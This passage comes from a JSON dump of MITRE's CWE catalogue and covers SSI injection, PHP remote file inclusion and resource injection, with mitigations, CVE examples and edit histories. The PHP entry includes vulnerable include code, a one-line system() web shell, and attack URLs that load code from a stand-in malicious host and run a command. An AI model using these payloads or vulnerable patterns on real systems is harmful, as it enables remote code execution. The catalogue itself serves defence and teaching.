Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Enabling_Factors_for_Exploitation, Other_Notes, Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Affected_Resources, Applicable_Platforms, Causal_Nature, Demonstrative_Examples, Enabling_Factors_for_Exploitation, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}],"Previous_Entry_Name":[{"#text":"Direct Static Code Injection","attr":{"@_Date":"2008-04-11"}},{"#text":"Insufficient Control of Directives in Statically Saved Code (Static Code Injection)","attr":{"@_Date":"2009-05-27"}},{"#text":"Improper Sanitization of Directives in Statically Saved Code (\'Static Code Injection\')","attr":{"@_Date":"2010-04-05"}}]}},"97":{"attr":{"@_ID":"97","@_Name":"Improper Neutralization of Server-Side Includes (SSI) Within a Web Page","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software generates a web page, but does not neutralize or incorrectly neutralizes user-controllable input that could be interpreted as a server-side include (SSI) directive.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"96","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Code or Commands"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Server-Side Includes (SSI) Injection"},{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":36,"Entry_Name":"SSI Injection"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"101"}},{"attr":{"@_CAPEC_ID":"35"}}]},"Notes":{"Note":{"#text":"This can be resultant from XSS/HTML injection because the same special characters can be involved. However, this is server-side code execution, not client-side.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Other_Notes, Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Description, Name, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"}],"Previous_Entry_Name":[{"#text":"Server-Side Includes (SSI) Injection","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Sanitize Server-Side Includes (SSI) Within a Web Page","attr":{"@_Date":"2010-06-21"}}]}},"98":{"attr":{"@_ID":"98","@_Name":"Improper Control of Filename for Include/Require Statement in PHP Program (\'PHP Remote File Inclusion\')","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The PHP application receives input from an upstream component, but it does not restrict or incorrectly restricts the input before its usage in \\"require,\\" \\"include,\\" or similar functions.","Extended_Description":"In certain versions and configurations of PHP, this can allow an attacker to specify a URL to a remote location from which the software will obtain the code to execute. In other cases in association with path traversal, the attacker can specify a local file that may contain executable statements that can be parsed by PHP.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"706","@_View_ID":"1000"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"829","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"94","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanAlsoBe","@_CWE_ID":"426","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"PHP","@_Prevalence":"Often"}}},"Alternate_Terms":{"Alternate_Term":[{"Term":"Remote file include"},{"Term":"RFI","Description":"The Remote File Inclusion (RFI) acronym is often used by vulnerability researchers."},{"Term":"Local file inclusion","Description":"This term is frequently used in cases in which remote download is disabled, or when the first part of the filename is not under the attacker\'s control, which forces use of relative path traversal (CWE-23) attack techniques to access files that may contain previously-injected PHP code, such as web access logs."}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."},{"Phase":"Architecture and Design"}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":{"Scope":["Integrity","Confidentiality","Availability"],"Impact":"Execute Unauthorized Code or Commands","Note":"The attacker may be able to specify arbitrary code to be executed from a remote location. Alternatively, it may be possible to use normal program behavior to insert php code into files on the local machine which can then be included and force the code to execute since php ignores everything in the file except for the content between php specifiers."}},"Detection_Methods":{"Detection_Method":[{"Method":"Manual Analysis","Description":"Manual white-box analysis can be very effective for finding this issue, since there is typically a relatively small number of include or require statements in each program.","Effectiveness":"High"},{"Method":"Automated Static Analysis","Description":{"xhtml:p":["The external control or influence of filenames can often be detected using automated static analysis that models data flow within the software.","Automated static analysis might not be able to recognize when proper input validation is being performed, leading to false positives - i.e., warnings that do not have any security consequences or require any code changes. If the program uses a customized input validation library, then some tools may allow the analyst to create custom signatures to detect usage of those routines."]}}]},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-4"},"Phase":"Architecture and Design","Strategy":"Libraries or Frameworks","Description":"Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid."},{"attr":{"@_Mitigation_ID":"MIT-21.1"},"Phase":"Architecture and Design","Strategy":"Enforcement by Conversion","Description":{"xhtml:p":["When the set of acceptable objects, such as filenames or URLs, is limited or known, create a mapping from a set of fixed input values (such as numeric IDs) to the actual filenames or URLs, and reject all other inputs.","For example, ID 1 could map to \\"inbox.txt\\" and ID 2 could map to \\"profile.txt\\". Features such as the ESAPI AccessReferenceMap [REF-185] provide this capability."]}},{"attr":{"@_Mitigation_ID":"MIT-15"},"Phase":"Architecture and Design","Description":"For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server."},{"attr":{"@_Mitigation_ID":"MIT-22"},"Phase":["Architecture and Design","Operation"],"Strategy":"Sandbox or Jail","Description":{"xhtml:p":["Run the code in a \\"jail\\" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by the software.","OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For example, java.io.FilePermission in the Java SecurityManager allows the software to specify restrictions on file operations.","This may not be a feasible solution, and it only limits the impact to the operating system; the rest of the application may still be subject to compromise.","Be careful to avoid CWE-243 and other weaknesses related to jails."]},"Effectiveness":"Limited","Effectiveness_Notes":"The effectiveness of this mitigation depends on the prevention capabilities of the specific sandbox or jail being used and might only help to reduce the scope of an attack, such as restricting the attacker to certain system calls or limiting the portion of the file system that can be accessed."},{"attr":{"@_Mitigation_ID":"MIT-17"},"Phase":["Architecture and Design","Operation"],"Strategy":"Environment Hardening","Description":"Run your code using the lowest privileges that are required to accomplish the necessary tasks [REF-76]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database administrator, especially in day-to-day operations."},{"attr":{"@_Mitigation_ID":"MIT-5.1"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.","When validating filenames, use stringent lists that limit the character set to be used. If feasible, only allow a single \\".\\" character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as \\"/\\" to avoid CWE-36. Use a list of allowable file extensions, which will help to avoid CWE-434.","Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a denylist, which may be incomplete (CWE-184). For example, filtering \\"/\\" is insufficient protection if the filesystem also supports the use of \\"\\\\\\" as a directory separator. Another possible error could occur when the filtering is applied in a way that still produces dangerous data (CWE-182). For example, if \\"../\\" sequences are removed from the \\".../...//\\" string in a sequential fashion, two instances of \\"../\\" would be removed from the original string, but the remaining characters would still form the \\"../\\" string."]},"Effectiveness":"High"},{"attr":{"@_Mitigation_ID":"MIT-34"},"Phase":["Architecture and Design","Operation"],"Strategy":"Attack Surface Reduction","Description":{"xhtml:p":["Store library, include, and utility files outside of the web document root, if possible. Otherwise, store them in a separate directory and use the web server\'s access control capabilities to prevent attackers from directly requesting them. One common practice is to define a fixed constant in each calling program, then check for the existence of the constant in the library/include file; if the constant does not exist, then the file was directly requested, and it can exit immediately.","This significantly reduces the chance of an attacker being able to bypass any protection mechanisms that are in the base program but not in the include files. It will also reduce the attack surface."]}},{"attr":{"@_Mitigation_ID":"MIT-6"},"Phase":["Architecture and Design","Implementation"],"Strategy":"Attack Surface Reduction","Description":{"xhtml:p":["Understand all the potential areas where untrusted inputs can enter your software: parameters or arguments, cookies, anything read from the network, environment variables, reverse DNS lookups, query results, request headers, URL components, e-mail, files, filenames, databases, and any external systems that provide data to the application. Remember that such inputs may be obtained indirectly through API calls.","Many file inclusion problems occur because the programmer assumed that certain inputs could not be modified, especially for cookies and URL components."]}},{"attr":{"@_Mitigation_ID":"MIT-29"},"Phase":"Operation","Strategy":"Firewall","Description":"Use an application firewall that can detect attacks against this weakness. It can be beneficial in cases in which the code cannot be fixed (because it is controlled by a third party), as an emergency prevention measure while more comprehensive software assurance measures are applied, or to provide defense in depth.","Effectiveness":"Moderate","Effectiveness_Notes":"An application firewall might not cover all possible input vectors. In addition, attack techniques might be available to bypass the protection mechanism, such as using malformed inputs that can still be processed by the component that receives those inputs. Depending on functionality, an application firewall might inadvertently reject or modify legitimate requests. Finally, some manual effort may be required for customization."},{"Phase":["Operation","Implementation"],"Strategy":"Environment Hardening","Description":"Develop and run your code in the most recent versions of PHP available, preferably PHP 6 or later. Many of the highly risky features in earlier PHP interpreters have been removed, restricted, or disabled by default."},{"attr":{"@_Mitigation_ID":"MIT-16"},"Phase":["Operation","Implementation"],"Strategy":"Environment Hardening","Description":{"xhtml:p":["When using PHP, configure the application so that it does not use register_globals. During implementation, develop the application so that it does not rely on this feature, but be wary of implementing a register_globals emulation that is subject to weaknesses such as CWE-95, CWE-621, and similar issues.","Often, programmers do not protect direct access to files intended only to be included by core programs. These include files may assume that critical variables have already been initialized by the calling program. As a result, the use of register_globals combined with the ability to directly access the include file may allow attackers to conduct file inclusion attacks. This remains an extremely common pattern as of 2009."]}},{"Phase":"Operation","Strategy":"Environment Hardening","Description":"Set allow_url_fopen to false, which limits the ability to include files from remote locations.","Effectiveness":"High","Effectiveness_Notes":"Be aware that some versions of PHP will still accept ftp:// and other URI schemes. In addition, this setting does not protect the code from path traversal attacks (CWE-22), which are frequently successful against the same vulnerable code that allows remote file inclusion."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following code, victim.php, attempts to include a function contained in a separate PHP page on the server. It builds the path to the file by using the supplied \'module_name\' parameter and appending the string \'/function.php\' to it.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"$dir = $_GET[\'module_name\'];include($dir . \\"/function.php\\");","xhtml:br":""}},{"attr":{"@_Nature":"attack"},"xhtml:div":"victim.php?module_name=http://malicious.example.com"},{"attr":{"@_Nature":"bad"},"xhtml:div":"system($_GET[\'cmd\']);"},{"attr":{"@_Nature":"attack"},"xhtml:div":"victim.php?module_name=http://malicious.example.com&amp;cmd=/bin/ls%20-l"},{"attr":{"@_Nature":"attack"},"xhtml:div":"/bin/ls -l"}],"Body_Text":["The problem with the above code is that the value of $dir is not restricted in any way, and a malicious user could manipulate the \'module_name\' parameter to force inclusion of an unanticipated file. For example, an attacker could request the above PHP page (example.php) with a \'module_name\' of \\"http://malicious.example.com\\" by using the following request string:","Upon receiving this request, the code would set \'module_name\' to the value \\"http://malicious.example.com\\" and would attempt to include http://malicious.example.com/function.php, along with any malicious code it contains.","For the sake of this example, assume that the malicious version of function.php looks like the following:","An attacker could now go a step further in our example and provide a request string as follows:","The code will attempt to include the malicious function.php file from the remote site. In turn, this file executes the command specified in the \'cmd\' parameter from the query string. The end result is an attempt by tvictim.php to execute the potentially malicious command, in this case:","Note that the above PHP example can be mitigated by setting allow_url_fopen to false, although this will not fully protect the code. See potential mitigations."]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2004-0285","Description":"Modification of assumed-immutable configuration variable in include file allows file inclusion via direct request.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0285"},{"Reference":"CVE-2004-0030","Description":"Modification of assumed-immutable configuration variable in include file allows file inclusion via direct request.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0030"},{"Reference":"CVE-2004-0068","Description":"Modification of assumed-immutable configuration variable in include file allows file inclusion via direct request.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0068"},{"Reference":"CVE-2005-2157","Description":"Modification of assumed-immutable configuration variable in include file allows file inclusion via direct request.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2157"},{"Reference":"CVE-2005-2162","Description":"Modification of assumed-immutable configuration variable in include file allows file inclusion via direct request.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2162"},{"Reference":"CVE-2005-2198","Description":"Modification of assumed-immutable configuration variable in include file allows file inclusion via direct request.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2198"},{"Reference":"CVE-2004-0128","Description":"Modification of assumed-immutable variable in configuration script leads to file inclusion.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0128"},{"Reference":"CVE-2005-1864","Description":"PHP file inclusion.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1864"},{"Reference":"CVE-2005-1869","Description":"PHP file inclusion.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1869"},{"Reference":"CVE-2005-1870","Description":"PHP file inclusion.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1870"},{"Reference":"CVE-2005-2154","Description":"PHP local file inclusion.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2154"},{"Reference":"CVE-2002-1704","Description":"PHP remote file include.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1704"},{"Reference":"CVE-2002-1707","Description":"PHP remote file include.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1707"},{"Reference":"CVE-2005-1964","Description":"PHP remote file include.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1964"},{"Reference":"CVE-2005-1681","Description":"PHP remote file include.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1681"},{"Reference":"CVE-2005-2086","Description":"PHP remote file include.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2086"},{"Reference":"CVE-2004-0127","Description":"Directory traversal vulnerability in PHP include statement.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0127"},{"Reference":"CVE-2005-1971","Description":"Directory traversal vulnerability in PHP include statement.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1971"},{"Reference":"CVE-2005-3335","Description":"PHP file inclusion issue, both remote and local; local include uses \\"..\\" and \\"%00\\" characters as a manipulation, but many remote file inclusion issues probably have this vector.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3335"},{"Reference":"CVE-2009-1936","Description":"chain: library file sends a redirect if it is directly requested but continues to execute, allowing remote file inclusion and path traversal.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1936"}]},"Affected_Resources":{"Affected_Resource":"File or Directory"},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"PHP File Include"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2007"},"Entry_ID":"A3","Entry_Name":"Malicious File Execution","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":5,"Entry_Name":"Remote File Inclusion"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"193"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-185"}},{"attr":{"@_External_Reference_ID":"REF-76"}},{"attr":{"@_External_Reference_ID":"REF-951"}},{"attr":{"@_External_Reference_ID":"REF-952"}},{"attr":{"@_External_Reference_ID":"REF-953"}}]},"Notes":{"Note":[{"attr":{"@_Type":"Relationship"},"xhtml:p":["This is frequently a functional consequence of other weaknesses. It is usually multi-factor with other factors (e.g. MAID), although not all inclusion bugs involve assumed-immutable data. Direct request weaknesses frequently play a role.","Can overlap directory traversal in local inclusion problems."]},{"#text":"Under-researched and under-reported. Other interpreted languages with \\"require\\" and \\"include\\" functionality could also product vulnerable applications, but as of 2007, PHP has been the focus. Any web-accessible language that uses executable file extensions is likely to have this type of issue, such as ASP, since .asp extensions are typically executable. Languages such as Perl are less likely to exhibit these problems because the .pl extension isn\'t always configured to be executable by the web server.","attr":{"@_Type":"Research Gap"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Relationship_Notes, Research_Gaps, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Alternate_Terms, Applicable_Platforms, Demonstrative_Examples, Likelihood_of_Exploit, Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Importance":"Critical","Modification_Comment":"converted from Compound_Element to Weakness"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Alternate_Terms, Common_Consequences, Detection_Factors, Potential_Mitigations, References, Related_Attack_Patterns, Relationships, Taxonomy_Mappings, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Alternate_Terms, Name, Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Affected_Resources, Demonstrative_Examples, Likelihood_of_Exploit, Modes_of_Introduction, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"PHP File Inclusion","attr":{"@_Date":"2008-04-11"}},{"#text":"Insufficient Control of Filename for Include/Require Statement in PHP Program (aka \'PHP File Inclusion\')","attr":{"@_Date":"2009-05-27"}},{"#text":"Improper Control of Filename for Include/Require Statement in PHP Program (\'PHP File Inclusion\')","attr":{"@_Date":"2013-02-21"}}]}},"99":{"attr":{"@_ID":"99","@_Name":"Improper Control of Resource Identifiers (\'Resource Injection\')","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software receives input from an upstream component, but it does not restrict or incorrectly restricts the input before it is used as an identifier for a resource that may be outside the intended sphere of control.","Extended_Description":{"xhtml:p":["A resource injection issue occurs when the following two conditions are met:","This may enable an attacker to access or modify otherwise protected system resources."],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ol":{"xhtml:li":["An attacker can specify the identifier used to access a system resource. For example, an attacker might be able to specify part of the name of a file to be opened or a port number to be used.","By specifying the resource, the attacker gains a capability that would not otherwise be permitted. For example, the program may give the attacker the ability to overwrite the specified file, run with a configuration controlled by the attacker, or transmit sensitive information to a third-party server."]}}},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"74","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"706","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanAlsoBe","@_CWE_ID":"73","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":{"Term":"Insecure Direct Object Reference","Description":"OWASP uses this term, although it is effectively the same as resource injection."}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Application Data","Modify Application Data","Read Files or Directories","Modify Files or Directories"],"Note":"An attacker could gain access to or modify sensitive data or system resources. This could allow access to protected files or directories including configuration files and files containing sensitive information."}},"Potential_Mitigations":{"Mitigation":{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, it can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}}},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The following Java code uses input from an HTTP request to create a file name. The programmer has not considered the possibility that an attacker could provide a file name such as \\"../../tomcat/conf/server.xml\\", which causes the application to delete one of its own configuration files.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"String rName = request.getParameter(\\"reportName\\");File rFile = new File(\\"/usr/local/apfr/reports/\\" + rName);...rFile.delete();","xhtml:br":["","",""]}}},{"Intro_Text":"The following code uses input from the command line to determine which file to open and echo back to the user. If the program runs with privileges and malicious users can create soft links to the file, they can use the program to read the first part of any file on the system.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C++"},"xhtml:div":{"#text":"ifstream ifs(argv[0]);string s;ifs &gt;&gt; s;cout &lt;&lt; s;","xhtml:br":["","",""]}},"Body_Text":"The kind of resource the data affects indicates the kind of content that may be dangerous. For example, data containing special characters like period, slash, and backslash, are risky when used in methods that interact with the file system. (Resource injection, when it is related to file system resources, sometimes goes by the name \\"path manipulation.\\") Similarly, data that contains URLs and URIs is risky for functions that create remote connections."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Resource Injection"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"},{"attr":{"@_Taxonomy_Name":"OMG ASCSM"},"Entry_ID":"ASCSM-CWE-99"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"10"}},{"attr":{"@_CAPEC_ID":"240"}},{"attr":{"@_CAPEC_ID":"75"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-6"}},{"attr":{"@_External_Reference_ID":"REF-962","@_Section":"ASCSM-CWE-99"}}]},"Notes":{"Note":[{"#text":"Resource injection that involves resources stored on the filesystem goes by the name path manipulation (CWE-73).","attr":{"@_Type":"Relationship"}},{"#text":"The relationship between CWE-99 and CWE-610 needs further investigation and clarification. They might be duplicates. CWE-99 \\"Resource Injection,\\" as originally defined in Seven Pernicious Kingdoms taxonomy, emphasizes the \\"identifier used to access a system resource\\" such as a file name or port number, yet it explicitly states that the \\"resource injection\\" term does not apply to \\"path manipulation,\\" which effectively identifies the path at which a resource can be found and could be considered to be one aspect of a resource identifier. Also, CWE-610 effectively covers any type of resource, whether that resource is at the system layer, the application layer, or the code layer.","attr":{"@_Type":"Maintenance"}}]},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Organization":"KDM Analytics","Modification_Date":"2008-08-01","Modification_Comment":"added/updated white box definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content 